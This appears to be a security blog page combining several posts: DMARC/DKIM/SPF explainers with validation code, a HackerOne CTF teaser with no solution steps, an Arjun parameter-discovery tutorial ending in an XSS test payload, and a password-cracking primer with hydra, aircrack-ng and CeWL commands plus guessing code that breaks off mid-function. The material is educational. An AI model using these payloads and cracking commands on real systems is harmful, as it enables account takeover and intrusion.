DMARC Record - Explained

SPF, DKIM and DMARC are the email authentication standards that companies publish in DNS so that receiving mail servers can tell whether a message really comes from the domain it claims to. Phishing and spam remain one of the easiest ways into a network: a single click on a malicious attachment or link can lead to ransomware, crypto-mining scripts, data leakage or privilege escalation inside an enterprise. These records stop attackers from sending mail as your exact domain; they do not stop phishing from look-alike domains, so they complement, rather than replace, user awareness and mail filtering.


DMARC is an acronym for “Domain-based Message Authentication, Reporting, and Conformance”. It is an email authentication, policy and reporting protocol built on top of SPF and DKIM, and it is published as a TXT record at _dmarc.<your-domain>. It has three basic purposes:

  • Checks that a message passed SPF or DKIM (either one is enough) and that the passing identifier is aligned with the From: domain the user sees,
  • Tells the receiving mail server what to do with a message for which neither check passes in an aligned way (deliver, quarantine or reject), and
  • Gives the receiving server a way to report back to the domain owner about messages that pass and fail the DMARC evaluation, which is what makes DMARC more than a policy switch.

Since DMARC relies on SPF and DKIM, you may wonder why it is needed at all. The answer is alignment. SPF authenticates the envelope sender (the SMTP MAIL FROM domain) and DKIM authenticates whatever domain is in the signature’s d= tag; neither of them, on its own, says anything about the From: address the user actually sees in the mail client. DMARC requires that at least one of those authenticated domains matches the From: domain (e.g., my-domain.com in me@my-domain.com), either exactly (strict) or at the organizational-domain level (relaxed, the default). This is what the folks at Dmarcian, a company founded by one of the primary authors of the DMARC specification, call “Identifier Alignment.”

CHECKING FOR DMARC RECORDS

DMARC Check Tool by MX Toolbox
  • Enter the domain name whose DMARC record you want to check. For example, GitHub.com.
  • If the tool returns a record, the domain has DMARC configured. Look at the p= tag: p=none only collects reports and does not stop spoofed mail, while p=quarantine or p=reject actually instruct receivers to act on it.
  • Without a third-party tool, the same check is a DNS TXT lookup of _dmarc.<domain> (for example with dig or nslookup).
If the domain has no record, check the next section.

CREATE DMARC RECORDS

Once you have both SPF and DKIM in place, it is time to create your DMARC record. The easiest way is to use a DMARC wizard; MXToolbox, DMARC Analyzer (requires sign-up), Dmarcian and others offer one. The dmarc.org site also lists utilities for generating DMARC records, DMARC lookup and parsing, message validation and more. Most of these sites can also validate your record once DNS propagation has taken place. Whatever you use, the result is a single TXT record published at _dmarc.<your-domain>.

Regardless of the tool you use, a DMARC record is a list of “tags”. Only two of them are actually required: “v” and “p”. The others are optional, and DMARC experts disagree somewhat on which optional tags are recommended. The required tags first:

  • v - The version tag, just like with SPF. It MUST be “DMARC1” and MUST be the first tag in the record.
  • p - The policy tag. It tells the receiving server what to do with a message from your domain that fails DMARC: “none” (deliver normally, just report), “quarantine” (treat as suspicious, typically the spam folder) or “reject” (refuse it at SMTP time).
Optional tags include the following:
  • pct - The percentage of failing messages the policy is applied to. The default is 100; a lower value (e.g. pct=25) lets you roll out quarantine or reject gradually, with the remaining messages handled by the next less strict policy.
  • rua=mailto:address@company.com - Where receivers should send aggregate reports. These XML reports list, per sending IP, how many messages passed or failed SPF, DKIM and alignment, which is how you discover forgotten legitimate senders as well as spoofing activity. They are normally sent once a day, so send them to a mailbox (or reporting service) set up specifically FOR these reports rather than to a domain admin account.
  • ruf=mailto:address@company.com - Where receivers should send failure (forensic) reports, i.e. samples of individual failing messages. Many large receivers do not send these at all for privacy reasons.
  • fo - Controls when a failure report is generated. It only has an effect if ruf is also set. The options (several can be combined, separated by colons) are:
    • 0: Generate a report only if all underlying mechanisms fail to produce an aligned “pass”, i.e. on a DMARC failure. This is the default.
    • 1: Generate a report if either SPF or DKIM produces something other than an aligned “pass”. This is the most informative option during rollout.
    • d: Generate a DKIM failure report if the message had a DKIM signature that failed to verify, regardless of alignment.
    • s: Generate an SPF failure report if the message failed SPF evaluation, regardless of alignment.
  • adkim / aspf - Alignment mode for DKIM and SPF respectively: “r” (relaxed, organizational-domain match, the default) or “s” (strict, exact match).
  • sp - Policy for subdomains. If omitted, subdomains inherit p.

So what does a DMARC record look like? Let's look at the record for SmarterTools:


v=DMARC1; p=none; rua=mailto:fbl@smartertools.com; fo=1


As you can see, both required tags (v and p) are set, plus two optional ones. The policy tag is “none”, so receivers keep delivering messages that fail DMARC and simply tell us about them through the aggregate reports sent to fbl@smartertools.com. (The fo=1 tag only matters if a ruf address is also published, which this record does not do.) From a rollout perspective, starting at p=none is the prudent course: every mailing list, CRM, ticketing system and marketing tool that sends as your domain has to be covered by SPF or DKIM with alignment before you tighten the policy, and the aggregate reports are how you find the ones you forgot. Once the reports show all legitimate sources passing, move to p=quarantine (optionally with a low pct), and finally to p=reject, which is the only setting that actually stops spoofed mail from being delivered.
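To make the alignment and policy rules concrete, here is an added example (not code from the original post or from any DMARC vendor) that parses a DMARC record the way a receiver does and decides the disposition of a message from its SPF and DKIM results. The record, domains and addresses in it are made up; the organizational-domain logic is simplified to “last two labels”, where real receivers consult the Public Suffix List.

```python
"""DMARC record parsing and disposition logic (worked example; not the page's or any vendor's code)."""
import random

POLICIES = ("none", "quarantine", "reject")


def parse_dmarc(record: str) -> dict:
    """Parse a DMARC TXT record into a tag dict and apply the RFC 7489 rules a
    receiver applies before trusting it: 'v=DMARC1' must be the first tag,
    'p' must be present and valid, 'pct' must be 0..100.
    Defaults are filled in for adkim, aspf, sp and pct."""
    parts = [p.strip() for p in record.split(";") if p.strip()]
    if not parts or parts[0].replace(" ", "") != "v=DMARC1":
        raise ValueError("v=DMARC1 must be the first tag")
    tags = {}
    for part in parts:
        if "=" not in part:
            raise ValueError(f"malformed tag: {part!r}")
        key, value = part.split("=", 1)
        tags[key.strip()] = value.strip()
    if tags.get("p") not in POLICIES:
        raise ValueError("p tag missing or not one of none/quarantine/reject")
    pct = int(tags.get("pct", "100"))
    if not 0 <= pct <= 100:
        raise ValueError("pct must be between 0 and 100")
    tags["pct"] = pct
    tags.setdefault("adkim", "r")
    tags.setdefault("aspf", "r")
    if tags.get("sp") not in POLICIES:
        tags["sp"] = tags["p"]          # subdomains inherit p when sp is absent
    return tags


def org_domain(domain: str) -> str:
    """Organizational domain used for relaxed alignment.
    Simplification for this example: the last two labels. Real receivers use
    the Public Suffix List, so e.g. example.co.uk would need special handling."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(from_domain: str, auth_domain: str, mode: str) -> bool:
    """Identifier alignment: strict ('s') needs an exact match, relaxed ('r')
    only needs the same organizational domain."""
    f, a = from_domain.lower().rstrip("."), auth_domain.lower().rstrip(".")
    return f == a if mode == "s" else org_domain(f) == org_domain(a)


def dmarc_disposition(record: str, record_domain: str, from_domain: str,
                      spf_pass_domain=None, dkim_pass_domains=(), sample=None):
    """Decide what a receiver does with one message.

    record_domain      domain whose _dmarc record this is
    from_domain        domain of the RFC 5322 From: header the user sees
    spf_pass_domain    MAIL FROM domain if SPF returned pass, else None
    dkim_pass_domains  d= values of DKIM signatures that verified
    sample             0..99 stand-in for the random draw used by pct (None = random)
    Returns (result, action): result is 'pass' or 'fail', action one of POLICIES."""
    tags = parse_dmarc(record)
    spf_ok = spf_pass_domain is not None and aligned(from_domain, spf_pass_domain, tags["aspf"])
    dkim_ok = any(aligned(from_domain, d, tags["adkim"]) for d in dkim_pass_domains)
    if spf_ok or dkim_ok:
        return "pass", "none"
    is_subdomain = from_domain.lower() != record_domain.lower()
    action = tags["sp"] if is_subdomain else tags["p"]
    # pct: only this share of failing messages gets the full policy; the rest
    # get the next less strict one (RFC 7489 section 6.6.4).
    draw = random.randrange(100) if sample is None else sample
    if draw >= tags["pct"]:
        action = {"reject": "quarantine", "quarantine": "none", "none": "none"}[action]
    return "fail", action


if __name__ == "__main__":
    rec = "v=DMARC1; p=reject; sp=quarantine; pct=50; rua=mailto:dmarc@example.com"
    print(dmarc_disposition(rec, "example.com", "example.com", spf_pass_domain="bounce.example.com"))
    print(dmarc_disposition(rec, "example.com", "example.com", spf_pass_domain="mailer.example.net", sample=75))
```

Note that SPF passing for an unrelated MAIL FROM domain (the mailer.example.net case) still yields a DMARC failure: authentication without alignment is exactly the gap DMARC closes.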



We hope this helps. If any suggestions or doubts you can add a comment and we will reply as soon as possible.


Are SPF, DKIM, and DMARC records Necessary



Having all three records in place is considered best practice. As the saying goes, “An ounce of prevention is worth a pound of cure”, and for email that is especially true. SPF and DKIM let receivers verify that a message really came from infrastructure you authorized, and DMARC ties that verification to the From: domain the user sees and tells receivers what to do when it fails. Without DMARC, SPF and DKIM on their own do not stop someone from putting your domain in the From: header. Having all three also signals to receiving providers, some of which now require them for bulk senders, that you as an administrator, and your domain administrators as well, are serious about preventing spam, phishing and other email abuse.




DKIM Record - Explained




DKIM is an acronym for DomainKeys Identified Mail. When a server configured for DKIM sends an email, it computes a hash of the (canonicalized) message body, then builds a DKIM-Signature header that lists the signed headers, the body hash and the domain and selector of the signing key, and signs that data with the domain’s private key. The resulting signature travels with the message as the b= value of the DKIM-Signature header.

When the receiver gets the email, it reads the d= (domain) and s= (selector) tags from the signature and fetches the public key with a DNS TXT query for <selector>._domainkey.<domain>. With that key it verifies the signature and recomputes the body hash; if both match, the receiver knows the message was signed by the holder of that domain’s private key and that the signed headers and the body were not altered in transit. Note that DKIM proves the signing domain, not the From: address the user sees; tying the two together is DMARC’s job.

CHECKING FOR DKIM RECORDS

DKIM Records Lookup by MX Toolbox
  • Enter the domain name and the selector. (A DKIM selector is a label that is prepended, together with _domainkey, to the domain to form the DNS name of a key record. This allows several keys to exist under one domain, so that different systems, time periods or third-party services can each sign with their own key.) For example, GitHub.com. You can find a sender’s selector in the s= tag of the DKIM-Signature header of any message it sent you.
  • If the tool returns a record with a p= public key, the domain signs with that selector. Check that the key is at least 1024 bits (2048 is recommended); an empty p= means the key has been revoked.

If the domain has no record for the selector, check the next section.

Create DKIM Records

Ideally, your mail server provides a tool that generates the key pair and the DNS record for you. (For SmarterMail users, information on “Setting Up Email Signing” is available in the Help documentation.) Regardless of how you create it, three pieces of information tie a signature to its record:
  • s - The selector. It is not a tag of the DNS record itself but part of the record’s name (<selector>._domainkey.<domain>), and it appears in the s= tag of every DKIM-Signature header the server produces. The sender chooses it (again, ideally automatically).
  • d - The signing domain, carried in the d= tag of the signature. Together with the selector it tells the receiver which DNS name to look up.
  • p - The actual public key, base64-encoded, published in DNS as the p= tag of the record. It looks like a long random string of upper- and lower-case letters, digits and a few punctuation characters.

Other record tags exist (v=DKIM1 for the version, k=rsa for the key type, t=y for testing mode), but p= is the essential one. A typical DKIM record therefore looks like this:

Name:  2B8U4DAB93D58YR._domainkey.yourdomain.com
Type:  TXT
Value: p=MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC1TaNgLlSyQMNWVLNLvyY/neDgaL2oqQE8T5illKqCgDtFHc8eHVAU+nlcaGmrKmDMw9dbgiGk1ocgZ56NR4ycfUHwQhvQPMUZw0cveel/8EAGoi/UyPmqfcPibytH81NFtTMAxUeM4Op8A6iHkvAMj5qLf4YRNsTkKAV

In the above, you’ll find the following:

  • Selector (s): 2B8U4DAB93D58YR
  • Domain (d): yourdomain.com
  • Public Key (p): MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC1TaNgLlSyQMNWVLNLvyY/neDgaL2oqQE8T5illKqCgDtFHc8eHVAU+nlcaGmrKmDMw9dbgiGk1ocgZ56NR4ycfUHwQhvQPMUZw0cveel/8EAGoi/UyPmqfcPibytH81NFtTMAxUeM4Op8A6iHkvAMj5qLf4YRNsTkKAV
The _domainkey label in the record name is fixed by the standard and is added automatically by most tools; DNS names are case-insensitive, so _domainKey and _domainkey refer to the same record. One practical point: a single TXT string is limited to 255 bytes, so 2048-bit keys are published as several quoted strings that resolvers concatenate.
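Verifying the body hash is something you can do by hand on any received message, without the public key, and it shows exactly how canonicalization feeds the bh= tag. The following is an added example (not the page's code, nor any mail server's) with a constructed message; the b= value in it is a placeholder, because checking b= needs the public key from DNS and an RSA library, which this example leaves out.

```python
"""DKIM body-hash (bh=) verification (worked example; not the page's code)."""
import base64
import hashlib
import re


def parse_tags(value: str) -> dict:
    """Parse a DKIM tag=value list. The same syntax is used in the DKIM-Signature
    header and in the <selector>._domainkey TXT record (RFC 6376 section 3.2);
    whitespace inside a value is header folding and is ignored."""
    tags = {}
    for part in value.split(";"):
        if "=" in part:
            key, val = part.split("=", 1)
            tags[key.strip()] = re.sub(r"\s+", "", val)
    return tags


def canonicalize_body(body: bytes, mode: str = "simple") -> bytes:
    """RFC 6376 sections 3.4.3 / 3.4.4 body canonicalization.
    simple : only trailing empty lines are removed; an empty body becomes CRLF.
    relaxed: additionally, runs of spaces/tabs collapse to one space and trailing
             whitespace on each line is removed; an empty body stays empty."""
    if mode == "relaxed":
        lines = [re.sub(rb"[ \t]+", b" ", ln).rstrip(b" \t") for ln in body.split(b"\r\n")]
        body = b"\r\n".join(lines)
    body = body.rstrip(b"\r\n")
    if body:
        return body + b"\r\n"
    return b"\r\n" if mode == "simple" else b""


def body_hash(body: bytes, mode: str = "simple", algo: str = "sha256") -> str:
    """The bh= value: base64 of the hash over the canonicalized body."""
    digest = hashlib.new(algo, canonicalize_body(body, mode)).digest()
    return base64.b64encode(digest).decode()


def check_body_hash(message: bytes):
    """Recompute bh= for a raw RFC 5322 message (CRLF line endings) and compare it
    with the value in its DKIM-Signature header. Returns (matches, expected, actual).
    This is only half of DKIM verification: the b= signature over the headers still
    has to be checked with the public key from DNS, which is not done here."""
    head, _, body = message.partition(b"\r\n\r\n")
    unfolded = re.sub(rb"\r\n[ \t]+", b" ", head).split(b"\r\n")
    sig = next((h.split(b":", 1)[1] for h in unfolded if h.lower().startswith(b"dkim-signature:")), None)
    if sig is None:
        return False, "", ""
    tags = parse_tags(sig.decode("ascii", "replace"))
    _, _, body_mode = tags.get("c", "simple/simple").partition("/")   # "relaxed" alone means relaxed/simple
    algo = tags.get("a", "rsa-sha256").rsplit("-", 1)[-1]
    actual = body_hash(body, body_mode or "simple", algo)
    expected = tags.get("bh", "")
    return actual == expected, expected, actual


# Constructed sample message: the bh= is computed here so the sample is
# self-consistent; the b= signature is a placeholder (no key involved).
SAMPLE_BODY = b"Please approve the attached invoice by Friday.\r\n"
SAMPLE_MESSAGE = (
    b"DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/simple; d=example.com;\r\n"
    + b"\ts=sel2024; h=from:to:subject; bh=" + body_hash(SAMPLE_BODY, "simple").encode() + b";\r\n"
    + b"\tb=PLACEHOLDER\r\n"
    + b"From: finance@example.com\r\nTo: you@example.org\r\nSubject: Invoice\r\n"
    + b"\r\n" + SAMPLE_BODY
)
TAMPERED_MESSAGE = SAMPLE_MESSAGE.replace(b"by Friday", b"to account 4711 today")

if __name__ == "__main__":
    print("original body hash matches:", check_body_hash(SAMPLE_MESSAGE)[0])
    print("tampered body hash matches:", check_body_hash(TAMPERED_MESSAGE)[0])
```

A body-hash mismatch on a message whose signature domain you trust is a strong sign that the body was modified after signing, for example by a mailing list footer or by an attacker relaying a legitimate message.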



SPF Record - Explained




SPF is an acronym for “Sender Policy Framework”. Like the other two mechanisms, SPF lives in a DNS TXT record; it lists which IP addresses and/or servers are allowed to send email on behalf of that domain. During the SMTP conversation the receiving server takes the domain from the envelope sender (the MAIL FROM address, or the HELO name when MAIL FROM is empty), looks up its SPF record and checks whether the connecting IP is authorized. It is a bit like the return address on a letter, except that the post office checks it against a published list of the sender’s mailboxes before delivering.

SPF lets receivers determine whether a message came from infrastructure the domain owner authorized, and so prevents simple envelope-sender spoofing. It does not check the From: header the user sees (DMARC adds that), it does not protect your DNS servers themselves, and it breaks when mail is forwarded, which is one reason to deploy it together with DKIM. The outcome of the check is recorded by the receiver in a Received-SPF or Authentication-Results header. SPF was first published as the experimental RFC 4408 in 2006 and was updated to the proposed standard RFC 7208 in 2014.


CHECKING FOR SPF RECORDS

SPF Checker website by MX Toolbox
  • Enter the domain name and search for the records. For example, GitHub.com.
  • If the tool returns a record beginning with v=spf1, the domain has SPF. Check that it ends with -all or ~all (a +all record authorizes the whole Internet) and that it stays within the limit of 10 DNS lookups, which the tool also reports.
If the domain has no record, check the next section.

Create SPF Records

An SPF record is a simple string that a domain administrator adds to DNS as a TXT entry at the domain itself (the same name as the mail domain). It is made of:
  • The SPF version being used.
  • The IPs that are authorized to send email for the domain.
  • Any third-party domains whose SPF records should be included, e.g. a newsletter or ticketing provider.
  • An ending “all” mechanism that tells a receiving server what to do when the connecting IP matched nothing before it.

v=spf1 ip4:22.23.24.25 include:another-domain-that-can-send-email-for-us.com -all

  • v=spf1 - This states that version 1 of SPF is being used. There is no other version, so this should always be “v=spf1”. (There was once a competing proposal, Sender ID with spf2.0 records, but it has been abandoned.)
  • ip4:22.23.24.25 - An IP address authorized to send email. Multiple IPs can be listed, either individually (ip4:22.23.24.25 ip4:12.13.14.15) or as a CIDR range (ip4:22.23.24.0/24). If your mail servers also send over IPv6, list those addresses too with ip6:, otherwise mail from them will fail. Hostname-based mechanisms (a, mx) exist as well, but each costs a DNS lookup.
  • include:another-domain-that-can-send-email-for-us.com - Pulls in the SPF record of another domain that is authorized to send on your behalf. If several providers are authorized, list each as a separate include. Keep in mind the hard limit of 10 DNS-querying terms (include, a, mx, ptr, exists and redirect) per evaluation, counting the lookups inside every included record; exceeding it produces a permerror and your mail fails authentication.
  • all - The “all” mechanism matches every IP that did not match an earlier term, so it determines the result for unauthorized senders. The outcome is dictated by the qualifier in front of it:
    • -all (dash all) - Fail. Servers not listed in the record are not authorized, and the receiver may reject the mail.
    • ~all (tilde all) - Softfail. The server is not listed, but the receiver should not flat-out reject the mail; it is typically accepted and marked as suspicious or used as an input to DMARC.
    • ?all (question-mark all) - Neutral. Equivalent to publishing no policy at all.
    • +all (plus all) - THIS IS NOT RECOMMENDED. It authorizes every IP address on the Internet to send mail for your domain, which makes the record useless.
Mechanisms are evaluated left to right and the first match wins, so “all” must be the last term; anything after it is never reached.
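The evaluation rules above (left-to-right matching, qualifiers, include, the 10-lookup limit) are easiest to understand by running them. The following is an added example, not part of the original post, that implements a minimal check_host() over a constructed dictionary standing in for DNS; the records and addresses are made up (plus the page's own 22.23.24.25), and the a, mx, ptr and exists mechanisms are only counted against the limit since there is no live DNS here.

```python
"""Minimal SPF check_host() over an in-memory stand-in for DNS (worked example; not a library)."""
import ipaddress

QUALIFIERS = {"+": "pass", "-": "fail", "~": "softfail", "?": "neutral"}
LOOKUP_MECHS = {"include", "a", "mx", "ptr", "exists", "redirect"}
MAX_LOOKUPS = 10   # RFC 7208 section 4.6.4

# Constructed records standing in for TXT lookups (documentation address ranges).
RECORDS = {
    "example.com": "v=spf1 ip4:22.23.24.25 include:mailer.example.net -all",
    "mailer.example.net": "v=spf1 ip4:198.51.100.0/24 ip6:2001:db8::/32 ~all",
    "soft.test": "v=spf1 ip4:192.0.2.0/24 ~all",
    "redir.test": "v=spf1 redirect=example.com",
    "loop.test": "v=spf1 include:loop.test -all",   # misconfiguration: includes itself
}


def _parse_term(term):
    """Split one term into (qualifier, name, argument, is_modifier)."""
    qualifier = "+"
    if term[0] in QUALIFIERS:
        qualifier, term = term[0], term[1:]
    if "=" in term.split(":", 1)[0]:         # modifier, e.g. redirect=example.com
        name, arg = term.split("=", 1)
        return qualifier, name.lower(), arg, True
    name, _, arg = term.partition(":")       # ip6 arguments contain ':' themselves
    name = name.split("/", 1)[0]             # "a/24" style prefix on the mechanism name
    return qualifier, name.lower(), arg, False


def check_host(ip: str, domain: str, records: dict, _counter=None) -> str:
    """Return pass/fail/softfail/neutral/none/permerror for a connecting IP and a
    MAIL FROM domain. The lookup counter is shared across include/redirect recursion."""
    counter = [0] if _counter is None else _counter
    record = records.get(domain.lower())
    if record is None:
        return "none"
    terms = record.split()
    if not terms or terms[0].lower() != "v=spf1":
        return "none"
    addr = ipaddress.ip_address(ip)
    redirect = None
    for term in terms[1:]:
        qualifier, name, arg, is_mod = _parse_term(term)
        if is_mod:
            if name == "redirect":
                redirect = arg
            continue                         # exp= and unknown modifiers are ignored
        if name in LOOKUP_MECHS:
            counter[0] += 1
            if counter[0] > MAX_LOOKUPS:
                return "permerror"
        if name == "all":
            matched = True
        elif name in ("ip4", "ip6"):
            try:
                net = ipaddress.ip_network(arg, strict=False)
            except ValueError:
                return "permerror"
            matched = addr.version == net.version and addr in net
        elif name == "include":
            sub = check_host(ip, arg, records, counter)
            if sub in ("none", "permerror"):
                return "permerror"           # included domain has no usable record
            matched = sub == "pass"          # fail/softfail/neutral inside include: no match
        else:
            matched = False   # a, mx, ptr, exists need live DNS; counted but never match here
        if matched:
            return QUALIFIERS[qualifier]
    if redirect is not None:                 # only reached when no "all" was present
        counter[0] += 1
        if counter[0] > MAX_LOOKUPS:
            return "permerror"
        sub = check_host(ip, redirect, records, counter)
        return "permerror" if sub == "none" else sub
    return "neutral"


def lookup_count(domain: str, records: dict, _seen=None) -> int:
    """Count the DNS-querying terms an evaluation of `domain` triggers, following
    include: and redirect= recursively. More than MAX_LOOKUPS is a permerror."""
    seen = set() if _seen is None else _seen
    if domain in seen:
        return MAX_LOOKUPS + 1               # include loop: guaranteed to exceed the limit
    seen.add(domain)
    total = 0
    for term in records.get(domain.lower(), "").split()[1:]:
        _, name, arg, is_mod = _parse_term(term)
        if is_mod and name != "redirect":
            continue
        if name in LOOKUP_MECHS:
            total += 1
            if name in ("include", "redirect"):
                total += lookup_count(arg, records, seen)
    return total


if __name__ == "__main__":
    for ip, dom in [("22.23.24.25", "example.com"), ("198.51.100.7", "example.com"),
                    ("203.0.113.9", "example.com"), ("203.0.113.9", "loop.test")]:
        print(f"{ip:>14} {dom:<14} {check_host(ip, dom, RECORDS)}  lookups={lookup_count(dom, RECORDS)}")
```

lookup_count() is the check to run before publishing: every include of a large provider brings its own nested includes, and a record that looks like three terms can easily cost twelve lookups.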




Get Your First Private Invite In HackerOne


In order to get private invites, bug hunters must have a good reputation and valid bugs. For newcomers that is hard to build on the public programs, which have been around for a long time and have already been swept for bugs by many researchers.

A private invite can really encourage a newcomer to hunt and increases their chances of getting a first valid bug. HackerOne hosts a CTF, and any participant who scores 26 points gets a private invite. This post shows how to solve the CTF in an easy way and get your first private invite.

Let's get started

This will give you 28 points, comfortably above the 26 needed, and a private invite to start with :)



Arjun - HTTP Parameter Discovery Suite

Arjun is a web application security tool that discovers the HTTP parameters an endpoint accepts, including ones that are not visible in the page or its links. Parameters are where user input enters the application, and therefore where an attacker looks for vulnerabilities such as XSS (Cross-Site Scripting), SQL Injection, LFI, RFI and so on. Arjun itself does not tell you whether a parameter is vulnerable; it tells you which parameter names the endpoint reacts to, so that you can then test them with payloads.

Consider the following example of how a parameter (or query) is used by a web application to accept user input. Here the parameter is id:

http://www.hackhunt.in/userinfo?id=92577488

Now suppose the same endpoint also accepts a hidden parameter named admin that, whenever set to true, makes it return extra information about the user. Nothing in the page reveals that it exists. Finding such valid but undocumented HTTP parameters is exactly what Arjun does: it sends large batches of candidate names from a wordlist, compares each response with a baseline, and narrows down the names that change the response.

Installation

There are two ways to install Arjun on Kali Linux:
  • One: it is published on PyPI, so pip3 install arjun works (recent Kali images already ship it as a package).
  • Two: clone it from GitHub with git clone https://github.com/s0md3v/Arjun.git and install it from the checkout with python3 setup.py install (or pip3 install . inside the cloned directory).
  • After installing, list the options with arjun -h or arjun --help.
  • For example, we take the deliberately vulnerable website testphp.vulnweb.com. Search for anything in the search box and the search parameters appear in the URL; copy that URL.
  • -u: specifies the target URL. In this scenario: arjun -u http://testphp.vulnweb.com/search.php?test=query
  • Arjun reports that the endpoint accepts the goButton and searchFor parameters. That only means the endpoint reacts to them; whether the input is sanitized is a separate question that you now test by hand, for example with a basic XSS payload: <script>alert("HackHunt")</script>
  • Try the payload in the search box (or directly in the searchFor parameter).
  • If the payload executes, the parameter is vulnerable to reflected XSS. In the same way you can find parameters on other endpoints with Arjun and then hunt on them with payloads.
Now, the options that control how Arjun scans:
  • -t: the number of threads.
  • -c: the chunk size, i.e. how many candidate parameters are sent in one request. Arjun picks a default; lower it for fragile targets or raise it for speed.
  • --stable: prefer stability over speed, because a fast scan against an inconsistent target can miss parameters.
Using these together gives better output, but it takes longer.
  • We tried the signup page on the same website (testphp.vulnweb.com) with -t 100, and Arjun found more parameters that may be worth testing, like uname and pass, along with searchFor and goButton.
  • --passive: helps when active scanning finds nothing. Arjun then collects candidate parameter names from passive sources such as the Wayback Machine, gau and OTX instead of relying only on its wordlist.
Note: some options have sensible defaults (for example -w selects the wordlist, but Arjun ships its own), so it is better not to change them unless you have a reason; the help output shows which options have defaults and which need a value.
For the full list of options, see the documentation: https://github.com/s0md3v/Arjun/wiki/Usage
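Arjun's core trick is response diffing with chunked requests and bisection. The following is an added example, not Arjun's own code, that implements that loop against a constructed in-memory endpoint (mock_target, a stand-in for the userinfo URL above) with two made-up hidden parameters; replacing mock_target with a function that performs a real HTTP request makes it work against a live target.

```python
"""Hidden-parameter discovery by response diffing, the technique Arjun automates
(worked example; not Arjun's code)."""

# Constructed stand-in for an HTTP endpoint: two hidden parameters change the page.
HIDDEN_PARAMS = {
    "admin": "<pre>role=administrator</pre>",
    "debug": "<pre>query=SELECT * FROM users</pre>",
}


def mock_target(params: dict) -> str:
    """Pretend GET /userinfo?id=92577488 (the page's example) plus whatever `params` adds."""
    body = "<html><h1>User 92577488</h1>"
    for name, extra in HIDDEN_PARAMS.items():
        if name in params:
            body += extra
    return body + "</html>"


def discover_params(request, wordlist, chunk_size=25, marker="hh7q"):
    """Send candidate parameter names in chunks, compare each response with a
    baseline, and bisect the chunks that change the response until single names
    remain. `request` is any callable taking a dict of parameters and returning the
    response body; swap in a real HTTP call for a real target.
    Returns {"found": sorted names, "requests": number of requests made}."""
    count = [0]

    def send(params):
        count[0] += 1
        return request(params)

    baseline = send({})
    # Stability check: a random parameter name must not change the page, otherwise
    # diffing is meaningless (dynamic content, CSRF tokens, timestamps...).
    if send({"zz_canary_zz": marker}) != baseline:
        raise RuntimeError("unstable target: response changes with a random parameter")

    found = []

    def probe(names):
        if send({n: marker for n in names}) == baseline:
            return                        # nothing in this chunk matters
        if len(names) == 1:
            found.append(names[0])
            return
        mid = len(names) // 2
        probe(names[:mid])
        probe(names[mid:])

    for start in range(0, len(wordlist), chunk_size):
        probe(wordlist[start:start + chunk_size])
    return {"found": sorted(found), "requests": count[0]}


# Constructed wordlist; Arjun's own list has tens of thousands of names.
WORDLIST = ["id", "admin", "page", "debug", "lang", "user", "token", "sort",
            "order", "limit"] + [f"param{i}" for i in range(30)]

if __name__ == "__main__":
    print(discover_params(mock_target, WORDLIST))
```

The request count is the point: 40 candidates are resolved in 16 requests instead of 40, and the saving grows with the wordlist, which is why Arjun can afford a large default list. The stability check is what the --stable option trades speed for on real targets.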


    Brute Force Attack v/s Dictionary Attack

Password cracking means recovering a victim's password, usually from a captured hash or handshake, by guessing candidates until one verifies. (Phishing is still the most common way to obtain credentials, but it is not cracking.) Two guessing strategies are discussed below.

Brute-Force Attack

A brute-force attack tries every possible combination of characters up to a given length, either generated on the fly or read from an exhaustive wordlist produced by a tool such as crunch, in which most “words” make no sense. It is guaranteed to find the password eventually, but the keyspace grows exponentially with length and character set, so the probability of success in a reasonable time is low for anything but short or simple passwords.

This kind of attack is most often seen against captured WPA/WPA2 handshakes, where guesses can be verified offline as fast as the hardware allows. (WEP is different: it is broken statistically by collecting enough IVs, not by guessing.) Against a website the same trick usually fails, because the application can rate-limit or lock the account after a maximum number of attempts.

The tools that can be used for brute forcing are:
  • aircrack-ng: for WiFi passwords. Command: aircrack-ng -w <wordlist file> -b <BSSID of the network> xyz.cap (the capture file containing the handshake)
  • hydra: for web apps, SSH, FTP and other online services. Command: hydra -l <username> (or -L <file of usernames>) -p <password> (or -P <file of passwords>) <target> <module, e.g. ssh, ftp, http-post-form> <module parameters>. For an HTTP form the module parameters are the path, the POST body with ^USER^ and ^PASS^ placeholders, and a string that identifies a failed login.

Dictionary Attack

A dictionary attack tries a list of likely passwords: real words, previously leaked passwords and, for a targeted attack, words built from information about the target such as names, dates of birth or company jargon. For a website CeWL is a good tool: it spiders the site, collects words of at least the specified length and stores them in a file as a wordlist.

The dictionary attack is similar to brute force in that both feed a list of guesses to the cracker, but the dictionary guesses are meaningful words, just like in a dictionary, so far fewer guesses are needed when the password is a common one. Most real-world cracking is dictionary-based, often with rules that mangle each word (appending digits or symbols, capitalizing, leetspeak).

One list that can be used is rockyou.txt, which on Kali is available under /usr/share/wordlists (it ships compressed as rockyou.txt.gz and has to be extracted first).

CeWL command: cewl -m 5 -w <output file> <URL>, where -m 5 is the minimum word length and -w the file in which the words are stored.
These are the most commonly used tools; there are many more, like Medusa, Ncrack, WPScan, etc.
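To put numbers on the difference, here is an added example (not part of the original post) that runs both strategies against an unsalted SHA-256 hash, counts guesses, and estimates how long an exhaustive search takes. The hash function, wordlist and mangling rules are constructed for the example; a rockyou-scale list would simply replace SAMPLE_WORDLIST.

```python
"""Brute force vs dictionary guessing against a password hash (worked example)."""
import hashlib
import itertools


def sha256_hex(password: str) -> str:
    """Unsalted SHA-256, standing in for whatever hash or handshake the cracker verifies against."""
    return hashlib.sha256(password.encode()).hexdigest()


def brute_force(target_hash: str, charset: str, max_len: int):
    """Try every string over `charset` of length 1..max_len (what crunch would
    generate). Returns (password or None, number of guesses made)."""
    guesses = 0
    for length in range(1, max_len + 1):
        for combo in itertools.product(charset, repeat=length):
            guesses += 1
            candidate = "".join(combo)
            if sha256_hex(candidate) == target_hash:
                return candidate, guesses
    return None, guesses


def dictionary_attack(target_hash: str, wordlist, rules=(lambda w: w,)):
    """Try each word, optionally mangled by simple rules (capitalize, append a
    year...), which turns a plain dictionary attack into a hybrid one."""
    guesses = 0
    for word in wordlist:
        for rule in rules:
            candidate = rule(word)
            guesses += 1
            if sha256_hex(candidate) == target_hash:
                return candidate, guesses
    return None, guesses


def keyspace(charset_size: int, max_len: int) -> int:
    """Number of candidates a full brute force of lengths 1..max_len must try."""
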